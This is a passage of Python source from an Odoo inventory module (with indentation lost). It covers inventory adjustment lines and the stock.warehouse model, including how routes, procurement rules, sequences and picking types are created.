dom = [('company_id', '=', line.company_id.id), ('location_id', '=', line.location_id.id), ('lot_id', '=', line.prod_lot_id.id),
('product_id','=', line.product_id.id), ('owner_id', '=', line.partner_id.id), ('package_id', '=', line.package_id.id)]
quants = quant_obj.search(cr, uid, dom, context=context)
return quants
def onchange_createline(self, cr, uid, ids, location_id=False, product_id=False, uom_id=False, package_id=False, prod_lot_id=False, partner_id=False, company_id=False, context=None):
quant_obj = self.pool["stock.quant"]
uom_obj = self.pool["product.uom"]
res = {'value': {}}
# If no UoM already put the default UoM of the product
if product_id:
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
uom = self.pool['product.uom'].browse(cr, uid, uom_id, context=context)
if product.uom_id.category_id.id != uom.category_id.id:
res['value']['product_uom_id'] = product.uom_id.id
res['domain'] = {'product_uom_id': [('category_id','=',product.uom_id.category_id.id)]}
uom_id = product.uom_id.id
# Calculate theoretical quantity by searching the quants as in quants_get
if product_id and location_id:
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
if not company_id:
company_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.id
dom = [('company_id', '=', company_id), ('location_id', '=', location_id), ('lot_id', '=', prod_lot_id),
('product_id','=', product_id), ('owner_id', '=', partner_id), ('package_id', '=', package_id)]
quants = quant_obj.search(cr, uid, dom, context=context)
th_qty = sum([x.qty for x in quant_obj.browse(cr, uid, quants, context=context)])
if product_id and uom_id and product.uom_id.id != uom_id:
th_qty = uom_obj._compute_qty(cr, uid, product.uom_id.id, th_qty, uom_id)
res['value']['theoretical_qty'] = th_qty
res['value']['product_qty'] = th_qty
return res
def _resolve_inventory_line(self, cr, uid, inventory_line, context=None):
stock_move_obj = self.pool.get('stock.move')
quant_obj = self.pool.get('stock.quant')
diff = inventory_line.theoretical_qty - inventory_line.product_qty
if not diff:
return
#each theorical_lines where difference between theoretical and checked quantities is not 0 is a line for which we need to create a stock move
vals = {
'name': _('INV:') + (inventory_line.inventory_id.name or ''),
'product_id': inventory_line.product_id.id,
'product_uom': inventory_line.product_uom_id.id,
'date': inventory_line.inventory_id.date,
'company_id': inventory_line.inventory_id.company_id.id,
'inventory_id': inventory_line.inventory_id.id,
'state': 'confirmed',
'restrict_lot_id': inventory_line.prod_lot_id.id,
'restrict_partner_id': inventory_line.partner_id.id,
}
inventory_location_id = inventory_line.product_id.property_stock_inventory.id
if diff < 0:
#found more than expected
vals['location_id'] = inventory_location_id
vals['location_dest_id'] = inventory_line.location_id.id
vals['product_uom_qty'] = -diff
else:
#found less than expected
vals['location_id'] = inventory_line.location_id.id
vals['location_dest_id'] = inventory_location_id
vals['product_uom_qty'] = diff
move_id = stock_move_obj.create(cr, uid, vals, context=context)
move = stock_move_obj.browse(cr, uid, move_id, context=context)
if diff > 0:
domain = [('qty', '>', 0.0), ('package_id', '=', inventory_line.package_id.id), ('lot_id', '=', inventory_line.prod_lot_id.id), ('location_id', '=', inventory_line.location_id.id)]
preferred_domain_list = [[('reservation_id', '=', False)], [('reservation_id.inventory_id', '!=', inventory_line.inventory_id.id)]]
quants = quant_obj.quants_get_preferred_domain(cr, uid, move.product_qty, move, domain=domain, preferred_domain_list=preferred_domain_list)
quant_obj.quants_reserve(cr, uid, quants, move, context=context)
elif inventory_line.package_id:
stock_move_obj.action_done(cr, uid, move_id, context=context)
quants = [x.id for x in move.quant_ids]
quant_obj.write(cr, SUPERUSER_ID, quants, {'package_id': inventory_line.package_id.id}, context=context)
res = quant_obj.search(cr, uid, [('qty', '<', 0.0), ('product_id', '=', move.product_id.id),
('location_id', '=', move.location_dest_id.id), ('package_id', '!=', False)], limit=1, context=context)
if res:
for quant in move.quant_ids:
if quant.location_id.id == move.location_dest_id.id: #To avoid we take a quant that was reconcile already
quant_obj._quant_reconcile_negative(cr, uid, quant, move, context=context)
return move_id
# Should be left out in next version
def restrict_change(self, cr, uid, ids, theoretical_qty, context=None):
return {}
# Should be left out in next version
def on_change_product_id(self, cr, uid, ids, product, uom, theoretical_qty, context=None):
""" Changes UoM
@param location_id: Location id
@param product: Changed product_id
@param uom: UoM product
@return: Dictionary of changed values
"""
if not product:
return {'value': {'product_uom_id': False}}
obj_product = self.pool.get('product.product').browse(cr, uid, product, context=context)
return {'value': {'product_uom_id': uom or obj_product.uom_id.id}}
#----------------------------------------------------------
# Stock Warehouse
#----------------------------------------------------------
class stock_warehouse(osv.osv):
_name = "stock.warehouse"
_description = "Warehouse"
_columns = {
'name': fields.char('Warehouse Name', required=True, select=True),
'company_id': fields.many2one('res.company', 'Company', required=True, readonly=True, select=True),
'partner_id': fields.many2one('res.partner', 'Address'),
'view_location_id': fields.many2one('stock.location', 'View Location', required=True, domain=[('usage', '=', 'view')]),
'lot_stock_id': fields.many2one('stock.location', 'Location Stock', domain=[('usage', '=', 'internal')], required=True),
'code': fields.char('Short Name', size=5, required=True, help="Short name used to identify your warehouse"),
'route_ids': fields.many2many('stock.location.route', 'stock_route_warehouse', 'warehouse_id', 'route_id', 'Routes', domain="[('warehouse_selectable', '=', True)]", help='Defaults routes through the warehouse'),
'reception_steps': fields.selection([
('one_step', 'Receive goods directly in stock (1 step)'),
('two_steps', 'Unload in input location then go to stock (2 steps)'),
('three_steps', 'Unload in input location, go through a quality control before being admitted in stock (3 steps)')], 'Incoming Shipments',
help="Default incoming route to follow", required=True),
'delivery_steps': fields.selection([
('ship_only', 'Ship directly from stock (Ship only)'),
('pick_ship', 'Bring goods to output location before shipping (Pick + Ship)'),
('pick_pack_ship', 'Make packages into a dedicated location, then bring them to the output location for shipping (Pick + Pack + Ship)')], 'Outgoing Shippings',
help="Default outgoing route to follow", required=True),
'wh_input_stock_loc_id': fields.many2one('stock.location', 'Input Location'),
'wh_qc_stock_loc_id': fields.many2one('stock.location', 'Quality Control Location'),
'wh_output_stock_loc_id': fields.many2one('stock.location', 'Output Location'),
'wh_pack_stock_loc_id': fields.many2one('stock.location', 'Packing Location'),
'mto_pull_id': fields.many2one('procurement.rule', 'MTO rule'),
'pick_type_id': fields.many2one('stock.picking.type', 'Pick Type'),
'pack_type_id': fields.many2one('stock.picking.type', 'Pack Type'),
'out_type_id': fields.many2one('stock.picking.type', 'Out Type'),
'in_type_id': fields.many2one('stock.picking.type', 'In Type'),
'int_type_id': fields.many2one('stock.picking.type', 'Internal Type'),
'crossdock_route_id': fields.many2one('stock.location.route', 'Crossdock Route'),
'reception_route_id': fields.many2one('stock.location.route', 'Receipt Route'),
'delivery_route_id': fields.many2one('stock.location.route', 'Delivery Route'),
'resupply_from_wh': fields.boolean('Resupply From Other Warehouses', help='Unused field'),
'resupply_wh_ids': fields.many2many('stock.warehouse', 'stock_wh_resupply_table', 'supplied_wh_id', 'supplier_wh_id', 'Resupply Warehouses'),
'resupply_route_ids': fields.one2many('stock.location.route', 'supplied_wh_id', 'Resupply Routes',
help="Routes will be created for these resupply warehouses and you can select them on products and product categories"),
'default_resupply_wh_id': fields.many2one('stock.warehouse', 'Default Resupply Warehouse', help="Goods will always be resupplied from this warehouse"),
}
def onchange_filter_default_resupply_wh_id(self, cr, uid, ids, default_resupply_wh_id, resupply_wh_ids, context=None):
resupply_wh_ids = set([x['id'] for x in (self.resolve_2many_commands(cr, uid, 'resupply_wh_ids', resupply_wh_ids, ['id']))])
if default_resupply_wh_id: #If we are removing the default resupply, we don't have default_resupply_wh_id
resupply_wh_ids.add(default_resupply_wh_id)
resupply_wh_ids = list(resupply_wh_ids)
return {'value': {'resupply_wh_ids': resupply_wh_ids}}
def _get_external_transit_location(self, cr, uid, warehouse, context=None):
''' returns browse record of inter company transit location, if found'''
data_obj = self.pool.get('ir.model.data')
location_obj = self.pool.get('stock.location')
try:
inter_wh_loc = data_obj.get_object_reference(cr, uid, 'stock', 'stock_location_inter_wh')[1]
except:
return False
return location_obj.browse(cr, uid, inter_wh_loc, context=context)
def _get_inter_wh_route(self, cr, uid, warehouse, wh, context=None):
return {
'name': _('%s: Supply Product from %s') % (warehouse.name, wh.name),
'warehouse_selectable': False,
'product_selectable': True,
'product_categ_selectable': True,
'supplied_wh_id': warehouse.id,
'supplier_wh_id': wh.id,
}
def _create_resupply_routes(self, cr, uid, warehouse, supplier_warehouses, default_resupply_wh, context=None):
route_obj = self.pool.get('stock.location.route')
pull_obj = self.pool.get('procurement.rule')
#create route selectable on the product to resupply the warehouse from another one
external_transit_location = self._get_external_transit_location(cr, uid, warehouse, context=context)
internal_transit_location = warehouse.company_id.internal_transit_location_id
input_loc = warehouse.wh_input_stock_loc_id
if warehouse.reception_steps == 'one_step':
input_loc = warehouse.lot_stock_id
for wh in supplier_warehouses:
transit_location = wh.company_id.id == warehouse.company_id.id and internal_transit_location or external_transit_location
if transit_location:
output_loc = wh.wh_output_stock_loc_id
if wh.delivery_steps == 'ship_only':
output_loc = wh.lot_stock_id
# Create extra MTO rule (only for 'ship only' because in the other cases MTO rules already exists)
mto_pull_vals = self._get_mto_pull_rule(cr, uid, wh, [(output_loc, transit_location, wh.out_type_id.id)], context=context)[0]
pull_obj.create(cr, uid, mto_pull_vals, context=context)
inter_wh_route_vals = self._get_inter_wh_route(cr, uid, warehouse, wh, context=context)
inter_wh_route_id = route_obj.create(cr, uid, vals=inter_wh_route_vals, context=context)
values = [(output_loc, transit_location, wh.out_type_id.id, wh), (transit_location, input_loc, warehouse.in_type_id.id, warehouse)]
pull_rules_list = self._get_supply_pull_rules(cr, uid, wh.id, values, inter_wh_route_id, context=context)
for pull_rule in pull_rules_list:
pull_obj.create(cr, uid, vals=pull_rule, context=context)
#if the warehouse is also set as default resupply method, assign this route automatically to the warehouse
if default_resupply_wh and default_resupply_wh.id == wh.id:
self.write(cr, uid, [warehouse.id, wh.id], {'route_ids': [(4, inter_wh_route_id)]}, context=context)
_defaults = {
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.inventory', context=c),
'reception_steps': 'one_step',
'delivery_steps': 'ship_only',
}
_sql_constraints = [
('warehouse_name_uniq', 'unique(name, company_id)', 'The name of the warehouse must be unique per company!'),
('warehouse_code_uniq', 'unique(code, company_id)', 'The code of the warehouse must be unique per company!'),
]
def _get_partner_locations(self, cr, uid, ids, context=None):
''' returns a tuple made of the browse record of customer location and the browse record of supplier location'''
data_obj = self.pool.get('ir.model.data')
location_obj = self.pool.get('stock.location')
try:
customer_loc = data_obj.get_object_reference(cr, uid, 'stock', 'stock_location_customers')[1]
supplier_loc = data_obj.get_object_reference(cr, uid, 'stock', 'stock_location_suppliers')[1]
except:
customer_loc = location_obj.search(cr, uid, [('usage', '=', 'customer')], context=context)
customer_loc = customer_loc and customer_loc[0] or False
supplier_loc = location_obj.search(cr, uid, [('usage', '=', 'supplier')], context=context)
supplier_loc = supplier_loc and supplier_loc[0] or False
if not (customer_loc and supplier_loc):
raise UserError(_('Can\'t find any customer or supplier location.'))
return location_obj.browse(cr, uid, [customer_loc, supplier_loc], context=context)
def _location_used(self, cr, uid, location_id, warehouse, context=None):
pull_obj = self.pool['procurement.rule']
push_obj = self.pool['stock.location.path']
domain = ['&', ('route_id', 'not in', [x.id for x in warehouse.route_ids]),
'|', ('location_src_id', '=', location_id), # noqa
('location_id', '=', location_id)
]
pulls = pull_obj.search_count(cr, uid, domain, context=context)
domain = ['&', ('route_id', 'not in', [x.id for x in warehouse.route_ids]),
'|', ('location_from_id', '=', location_id), # noqa
('location_dest_id', '=', location_id)
]
pushs = push_obj.search_count(cr, uid, domain, context=context)
if pulls or pushs:
return True
return False
def switch_location(self, cr, uid, ids, warehouse, new_reception_step=False, new_delivery_step=False, context=None):
location_obj = self.pool.get('stock.location')
new_reception_step = new_reception_step or warehouse.reception_steps
new_delivery_step = new_delivery_step or warehouse.delivery_steps
if warehouse.reception_steps != new_reception_step:
if not self._location_used(cr, uid, warehouse.wh_input_stock_loc_id.id, warehouse, context=context):
location_obj.write(cr, uid, [warehouse.wh_input_stock_loc_id.id, warehouse.wh_qc_stock_loc_id.id], {'active': False}, context=context)
if new_reception_step != 'one_step':
location_obj.write(cr, uid, warehouse.wh_input_stock_loc_id.id, {'active': True}, context=context)
if new_reception_step == 'three_steps':
location_obj.write(cr, uid, warehouse.wh_qc_stock_loc_id.id, {'active': True}, context=context)
if warehouse.delivery_steps != new_delivery_step:
if not self._location_used(cr, uid, warehouse.wh_output_stock_loc_id.id, warehouse, context=context):
location_obj.write(cr, uid, [warehouse.wh_output_stock_loc_id.id], {'active': False}, context=context)
if not self._location_used(cr, uid, warehouse.wh_pack_stock_loc_id.id, warehouse, context=context):
location_obj.write(cr, uid, [warehouse.wh_pack_stock_loc_id.id], {'active': False}, context=context)
if new_delivery_step != 'ship_only':
location_obj.write(cr, uid, warehouse.wh_output_stock_loc_id.id, {'active': True}, context=context)
if new_delivery_step == 'pick_pack_ship':
location_obj.write(cr, uid, warehouse.wh_pack_stock_loc_id.id, {'active': True}, context=context)
return True
def _get_reception_delivery_route(self, cr, uid, warehouse, route_name, context=None):
return {
'name': self._format_routename(cr, uid, warehouse, route_name, context=context),
'product_categ_selectable': True,
'product_selectable': False,
'sequence': 10,
}
def _get_supply_pull_rules(self, cr, uid, supply_warehouse, values, new_route_id, context=None):
pull_rules_list = []
for from_loc, dest_loc, pick_type_id, warehouse in values:
pull_rules_list.append({
'name': self._format_rulename(cr, uid, warehouse, from_loc, dest_loc, context=context),
'location_src_id': from_loc.id,
'location_id': dest_loc.id,
'route_id': new_route_id,
'action': 'move',
'picking_type_id': pick_type_id,
'procure_method': warehouse.lot_stock_id.id != from_loc.id and 'make_to_order' or 'make_to_stock', # first part of the resuply route is MTS
'warehouse_id': warehouse.id,
'propagate_warehouse_id': supply_warehouse,
})
return pull_rules_list
def _get_push_pull_rules(self, cr, uid, warehouse, active, values, new_route_id, context=None):
first_rule = True
push_rules_list = []
pull_rules_list = []
for from_loc, dest_loc, pick_type_id in values:
push_rules_list.append({
'name': self._format_rulename(cr, uid, warehouse, from_loc, dest_loc, context=context),
'location_from_id': from_loc.id,
'location_dest_id': dest_loc.id,
'route_id': new_route_id,
'auto': 'manual',
'picking_type_id': pick_type_id,
'active': active,
'warehouse_id': warehouse.id,
})
pull_rules_list.append({
'name': self._format_rulename(cr, uid, warehouse, from_loc, dest_loc, context=context),
'location_src_id': from_loc.id,
'location_id': dest_loc.id,
'route_id': new_route_id,
'action': 'move',
'picking_type_id': pick_type_id,
'procure_method': first_rule is True and 'make_to_stock' or 'make_to_order',
'active': active,
'warehouse_id': warehouse.id,
})
first_rule = False
return push_rules_list, pull_rules_list
def _get_mto_route(self, cr, uid, context=None):
route_obj = self.pool.get('stock.location.route')
data_obj = self.pool.get('ir.model.data')
try:
mto_route_id = data_obj.get_object_reference(cr, uid, 'stock', 'route_warehouse0_mto')[1]
except:
mto_route_id = route_obj.search(cr, uid, [('name', 'like', _('Make To Order'))], context=context)
mto_route_id = mto_route_id and mto_route_id[0] or False
if not mto_route_id:
raise UserError(_('Can\'t find any generic Make To Order route.'))
return mto_route_id
def _check_remove_mto_resupply_rules(self, cr, uid, warehouse, context=None):
""" Checks that the moves from the different """
pull_obj = self.pool.get('procurement.rule')
mto_route_id = self._get_mto_route(cr, uid, context=context)
rules = pull_obj.search(cr, uid, ['&', ('location_src_id', '=', warehouse.lot_stock_id.id), ('location_id.usage', '=', 'transit')], context=context)
pull_obj.unlink(cr, uid, rules, context=context)
def _get_mto_pull_rule(self, cr, uid, warehouse, values, context=None):
mto_route_id = self._get_mto_route(cr, uid, context=context)
res = []
for value in values:
from_loc, dest_loc, pick_type_id = value
res += [{
'name': self._format_rulename(cr, uid, warehouse, from_loc, dest_loc, context=context) + _(' MTO'),
'location_src_id': from_loc.id,
'location_id': dest_loc.id,
'route_id': mto_route_id,
'action': 'move',
'picking_type_id': pick_type_id,
'procure_method': 'make_to_order',
'active': True,
'warehouse_id': warehouse.id,
}]
return res
def _get_crossdock_route(self, cr, uid, warehouse, route_name, context=None):
return {
'name': self._format_routename(cr, uid, warehouse, route_name, context=context),
'warehouse_selectable': False,
'product_selectable': True,
'product_categ_selectable': True,
'active': warehouse.delivery_steps != 'ship_only' and warehouse.reception_steps != 'one_step',
'sequence': 20,
}
def create_routes(self, cr, uid, ids, warehouse, context=None):
wh_route_ids = []
route_obj = self.pool.get('stock.location.route')
pull_obj = self.pool.get('procurement.rule')
push_obj = self.pool.get('stock.location.path')
routes_dict = self.get_routes_dict(cr, uid, ids, warehouse, context=context)
#create reception route and rules
route_name, values = routes_dict[warehouse.reception_steps]
route_vals = self._get_reception_delivery_route(cr, uid, warehouse, route_name, context=context)
reception_route_id = route_obj.create(cr, uid, route_vals, context=context)
wh_route_ids.append((4, reception_route_id))
push_rules_list, pull_rules_list = self._get_push_pull_rules(cr, uid, warehouse, True, values, reception_route_id, context=context)
#create the push/procurement rules
for push_rule in push_rules_list:
push_obj.create(cr, uid, vals=push_rule, context=context)
for pull_rule in pull_rules_list:
#all procurement rules in reception route are mto, because we don't want to wait for the scheduler to trigger an orderpoint on input location
pull_rule['procure_method'] = 'make_to_order'
pull_obj.create(cr, uid, vals=pull_rule, context=context)
#create MTS route and procurement rules for delivery and a specific route MTO to be set on the product
route_name, values = routes_dict[warehouse.delivery_steps]
route_vals = self._get_reception_delivery_route(cr, uid, warehouse, route_name, context=context)
#create the route and its procurement rules
delivery_route_id = route_obj.create(cr, uid, route_vals, context=context)
wh_route_ids.append((4, delivery_route_id))
dummy, pull_rules_list = self._get_push_pull_rules(cr, uid, warehouse, True, values, delivery_route_id, context=context)
for pull_rule in pull_rules_list:
pull_obj.create(cr, uid, vals=pull_rule, context=context)
#create MTO procurement rule and link it to the generic MTO route
mto_pull_vals = self._get_mto_pull_rule(cr, uid, warehouse, values, context=context)[0]
mto_pull_id = pull_obj.create(cr, uid, mto_pull_vals, context=context)
#create a route for cross dock operations, that can be set on products and product categories
route_name, values = routes_dict['crossdock']
crossdock_route_vals = self._get_crossdock_route(cr, uid, warehouse, route_name, context=context)
crossdock_route_id = route_obj.create(cr, uid, vals=crossdock_route_vals, context=context)
wh_route_ids.append((4, crossdock_route_id))
dummy, pull_rules_list = self._get_push_pull_rules(cr, uid, warehouse, warehouse.delivery_steps != 'ship_only' and warehouse.reception_steps != 'one_step', values, crossdock_route_id, context=context)
for pull_rule in pull_rules_list:
# Fixed cross-dock is logically mto
pull_rule['procure_method'] = 'make_to_order'
pull_obj.create(cr, uid, vals=pull_rule, context=context)
#create route selectable on the product to resupply the warehouse from another one
self._create_resupply_routes(cr, uid, warehouse, warehouse.resupply_wh_ids, warehouse.default_resupply_wh_id, context=context)
#return routes and mto procurement rule to store on the warehouse
return {
'route_ids': wh_route_ids,
'mto_pull_id': mto_pull_id,
'reception_route_id': reception_route_id,
'delivery_route_id': delivery_route_id,
'crossdock_route_id': crossdock_route_id,
}
def change_route(self, cr, uid, ids, warehouse, new_reception_step=False, new_delivery_step=False, context=None):
picking_type_obj = self.pool.get('stock.picking.type')
pull_obj = self.pool.get('procurement.rule')
push_obj = self.pool.get('stock.location.path')
route_obj = self.pool.get('stock.location.route')
new_reception_step = new_reception_step or warehouse.reception_steps
new_delivery_step = new_delivery_step or warehouse.delivery_steps
#change the default source and destination location and (de)activate picking types
input_loc = warehouse.wh_input_stock_loc_id
if new_reception_step == 'one_step':
input_loc = warehouse.lot_stock_id
output_loc = warehouse.wh_output_stock_loc_id
if new_delivery_step == 'ship_only':
output_loc = warehouse.lot_stock_id
picking_type_obj.write(cr, uid, warehouse.in_type_id.id, {'default_location_dest_id': input_loc.id}, context=context)
picking_type_obj.write(cr, uid, warehouse.out_type_id.id, {'default_location_src_id': output_loc.id}, context=context)
picking_type_obj.write(cr, uid, warehouse.pick_type_id.id, {
'active': new_delivery_step != 'ship_only',
'default_location_dest_id': output_loc.id if new_delivery_step == 'pick_ship' else warehouse.wh_pack_stock_loc_id.id,
}, context=context)
picking_type_obj.write(cr, uid, warehouse.pack_type_id.id, {'active': new_delivery_step == 'pick_pack_ship'}, context=context)
routes_dict = self.get_routes_dict(cr, uid, ids, warehouse, context=context)
#update delivery route and rules: unlink the existing rules of the warehouse delivery route and recreate it
pull_obj.unlink(cr, uid, [pu.id for pu in warehouse.delivery_route_id.pull_ids], context=context)
route_name, values = routes_dict[new_delivery_step]
route_obj.write(cr, uid, warehouse.delivery_route_id.id, {'name': self._format_routename(cr, uid, warehouse, route_name, context=context)}, context=context)
dummy, pull_rules_list = self._get_push_pull_rules(cr, uid, warehouse, True, values, warehouse.delivery_route_id.id, context=context)
#create the procurement rules
for pull_rule in pull_rules_list:
pull_obj.create(cr, uid, vals=pull_rule, context=context)
#update receipt route and rules: unlink the existing rules of the warehouse receipt route and recreate it
pull_obj.unlink(cr, uid, [pu.id for pu in warehouse.reception_route_id.pull_ids], context=context)
push_obj.unlink(cr, uid, [pu.id for pu in warehouse.reception_route_id.push_ids], context=context)
route_name, values = routes_dict[new_reception_step]
route_obj.write(cr, uid, warehouse.reception_route_id.id, {'name': self._format_routename(cr, uid, warehouse, route_name, context=context)}, context=context)
push_rules_list, pull_rules_list = self._get_push_pull_rules(cr, uid, warehouse, True, values, warehouse.reception_route_id.id, context=context)
#create the push/procurement rules
for push_rule in push_rules_list:
push_obj.create(cr, uid, vals=push_rule, context=context)
for pull_rule in pull_rules_list:
#all procurement rules in receipt route are mto, because we don't want to wait for the scheduler to trigger an orderpoint on input location
pull_rule['procure_method'] = 'make_to_order'
pull_obj.create(cr, uid, vals=pull_rule, context=context)
route_obj.write(cr, uid, warehouse.crossdock_route_id.id, {'active': new_reception_step != 'one_step' and new_delivery_step != 'ship_only'}, context=context)
#change MTO rule
dummy, values = routes_dict[new_delivery_step]
mto_pull_vals = self._get_mto_pull_rule(cr, uid, warehouse, values, context=context)[0]
pull_obj.write(cr, uid, warehouse.mto_pull_id.id, mto_pull_vals, context=context)
return True
def create_sequences_and_picking_types(self, cr, uid, warehouse, context=None):
seq_obj = self.pool.get('ir.sequence')
picking_type_obj = self.pool.get('stock.picking.type')
#create new sequences
in_seq_id = seq_obj.create(cr, SUPERUSER_ID, {'name': warehouse.name + _(' Sequence in'), 'prefix': warehouse.code + '/IN/', 'padding': 5}, context=context)
out_seq_id = seq_obj.create(cr, SUPERUSER_ID, {'name': warehouse.name + _(' Sequence out'), 'prefix': warehouse.code + '/OUT/', 'padding': 5}, context=context)
pack_seq_id = seq_obj.create(cr, SUPERUSER_ID, {'name': warehouse.name + _(' Sequence packing'), 'prefix': warehouse.code + '/PACK/', 'padding': 5}, context=context)
pick_seq_id = seq_obj.create(cr, SUPERUSER_ID, {'name': warehouse.name + _(' Sequence picking'), 'prefix': warehouse.code + '/PICK/', 'padding': 5}, context=context)
int_seq_id = seq_obj.create(cr, SUPERUSER_ID, {'name': warehouse.name + _(' Sequence internal'), 'prefix': warehouse.code + '/INT/', 'padding': 5}, context=context)
wh_stock_loc = warehouse.lot_stock_id
wh_input_stock_loc = warehouse.wh_input_stock_loc_id
wh_output_stock_loc = warehouse.wh_output_stock_loc_id
wh_pack_stock_loc = warehouse.wh_pack_stock_loc_id
#create in, out, internal picking types for warehouse
input_loc = wh_input_stock_loc
if warehouse.reception_steps == 'one_step':
input_loc = wh_stock_loc
output_loc = wh_output_stock_loc
if warehouse.delivery_steps == 'ship_only':
output_loc = wh_stock_loc
#choose the next available color for the picking types of this warehouse
color = 0
available_colors = [0, 3, 4, 5, 6, 7, 8, 1, 2] # put white color first
all_used_colors = self.pool.get('stock.picking.type').search_read(cr, uid, [('warehouse_id', '!=', False), ('color', '!=', False)], ['color'], order='color')
#don't use sets to preserve the list order
for x in all_used_colors:
if x['color'] in available_colors:
available_colors.remove(x['color'])
if available_colors:
color = available_colors[0]
#order the picking types with a sequence allowing to have the following suit for each warehouse: reception, internal, pick, pack, ship.
max_sequence = self.pool.get('stock.picking.type').search_read(cr, uid, [], ['sequence'], order='sequence desc')
max_sequence = max_sequence and max_sequence[0]['sequence'] or 0
internal_active_false = (warehouse.reception_steps == 'one_step') and (warehouse.delivery_steps == 'ship_only')
internal_active_false = internal_active_false and not self.user_has_groups(cr, uid, 'stock.group_locations')
in_type_id = picking_type_obj.create(cr, uid, vals={
'name': _('Receipts'),
'warehouse_id': warehouse.id,
'code': 'incoming',
'use_create_lots': True,
'use_existing_lots': False,
'sequence_id': in_seq_id,
'default_location_src_id': False,
'default_location_dest_id': input_loc.id,
'sequence': max_sequence + 1,
'color': color}, context=context)
out_type_id = picking_type_obj.create(cr, uid, vals={
'name': _('Delivery Orders'),
'warehouse_id': warehouse.id,
'code': 'outgoing',
'use_create_lots': False,
'use_existing_lots': True,
'sequence_id': out_seq_id,
'return_picking_type_id': in_type_id,
'default_location_src_id': output_loc.id,
'default_location_dest_id': False,
'sequence': max_sequence + 4,
'color': color}, context=context)
picking_type_obj.write(cr, uid, [in_type_id], {'return_picking_type_id': out_type_id}, context=context)
int_type_id = picking_type_obj.create(cr, uid, vals={
'name': _('Internal Transfers'),
'warehouse_id': warehouse.id,
'code': 'internal',
'use_create_lots': False,
'use_existing_lots': True,
'sequence_id': int_seq_id,
'default_location_src_id': wh_stock_loc.id,
'default_location_dest_id': wh_stock_loc.id,
'active': not internal_active_false,
'sequence': max_sequence + 2,
'color': color}, context=context)
pack_type_id = picking_type_obj.create(cr, uid, vals={
'name': _('Pack'),
'warehouse_id': warehouse.id,
'code': 'internal',
'use_create_lots': False,
'use_existing_lots': True,
'sequence_id': pack_seq_id,
'default_location_src_id': wh_pack_stock_loc.id,
'default_location_dest_id': output_loc.id,
'active': warehouse.delivery_steps == 'pick_pack_ship',
'sequence': max_sequence + 3,
'color': color}, context=context)
pick_type_id = picking_type_obj.create(cr, uid, vals={
'name': _('Pick'),
'warehouse_id': warehouse.id,
'code': 'internal',
'use_create_lots': False,
'use_existing_lots': True,
'sequence_id': pick_seq_id,
'default_location_src_id': wh_stock_loc.id,
'default_location_dest_id': output_loc.id if warehouse.delivery_steps == 'pick_ship' else wh_pack_stock_loc.id,
'active': warehouse.delivery_steps != 'ship_only',
'sequence': max_sequence + 2,
'color': color}, context=context)
#write picking types on WH
vals = {
'in_type_id': in_type_id,
'out_type_id': out_type_id,
'pack_type_id': pack_type_id,
'pick_type_id': pick_type_id,
'int_type_id': int_type_id,
}
super(stock_warehouse, self).write(cr, uid, warehouse.id, vals=vals, context=context)
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
if vals is None:
vals = {}
data_obj = self.pool.get('ir.model.data')
seq_obj = self.pool.get('ir.sequence')
picking_type_obj = self.pool.get('stock.picking.type')
location_obj = self.pool.get('stock.location')
#create view location for warehouse
loc_vals = {
'name': _(vals.get('code')),
'usage': 'view',
'location_id': data_obj.get_object_reference(cr, uid, 'stock', 'stock_location_locations')[1],
}
if vals.get('company_id'):
loc_vals['company_id'] = vals.get('company_id')
wh_loc_id = location_obj.create(cr, uid, loc_vals, context=context)
vals['view_location_id'] = wh_loc_id
#create all location
def_values = self.default_get(cr, uid, ['reception_steps', 'delivery_steps'])
reception_steps = vals.get('reception_steps', def_values['reception_steps'])
delivery_steps = vals.get('delivery_steps', def_values['delivery_steps'])
context_with_inactive = context.copy()
context_with_inactive['active_test'] = False
sub_locations = [
{'name': _('Stock'), 'active': True, 'field': 'lot_stock_id'},
{'name': _('Input'), 'active': reception_steps != 'one_step', 'field': 'wh_input_stock_loc_id'},
{'name': _('Quality Control'), 'active': reception_steps == 'three_steps', 'field': 'wh_qc_stock_loc_id'},
{'name': _('Output'), 'active': delivery_steps != 'ship_only', 'field': 'wh_output_stock_loc_id'},
{'name': _('Packing Zone'), 'active': delivery_steps == 'pick_pack_ship', 'field': 'wh_pack_stock_loc_id'},
]
for values in sub_locations:
loc_vals = {
'name': values['name'],
'usage': 'internal',
'location_id': wh_loc_id,
'active': values['active'],
}
if vals.get('company_id'):
loc_vals['company_id'] = vals.get('company_id')
location_id = location_obj.create(cr, uid, loc_vals, context=context_with_inactive)
vals[values['field']] = location_id
#create WH
new_id = super(stock_warehouse, self).create(cr, uid, vals=vals, context=context)
warehouse = self.browse(cr, uid, new_id, context=context)
self.create_sequences_and_picking_types(cr, uid, warehouse, context=context)
#create routes and push/procurement rules
new_objects_dict = self.create_routes(cr, uid, new_id, warehouse, context=context)
self.write(cr, uid, warehouse.id, new_objects_dict, context=context)
# If partner assigned
if vals.get('partner_id'):
comp_obj = self.pool['res.company']
if vals.get('company_id'):
transit_loc = comp_obj.browse(cr, uid, vals.get('company_id'), context=context).internal_transit_location_id.id
else:
transit_loc = comp_obj.browse(cr, uid, comp_obj._company_default_get(cr, uid, 'stock.warehouse', context=context)).internal_transit_location_id.id
self.pool['res.partner'].write(cr, uid, [vals['partner_id']], {'property_stock_customer': transit_loc,
'property_stock_supplier': transit_loc}, context=context)
return new_id
def _format_rulename(self, cr, uid, obj, from_loc, dest_loc, context=None):
return obj.code + ': ' + from_loc.name + ' -> ' + dest_loc.name
def _format_routename(self, cr, uid, obj, name, context=None):
return obj.name + ': ' + name
def get_routes_dict(self, cr, uid, ids, warehouse, context=None):
#fetch customer and supplier locations, for references
customer_loc, supplier_loc = self._get_partner_locations(cr, uid, ids, context=context)
return {
'one_step': (_('Receipt in 1 step'), []),
'two_steps': (_('Receipt in 2 steps'), [(warehouse.wh_input_stock_loc_id, warehouse.lot_stock_id, warehouse.int_type_id.id)]),
'three_steps': (_('Receipt in 3 steps'), [(warehouse.wh_input_stock_loc_id, warehouse.wh_qc_stock_loc_id, warehouse.int_type_id.id), (warehouse.wh_qc_stock_loc_id, warehouse.lot_stock_id, warehouse.int_type_id.id)]),
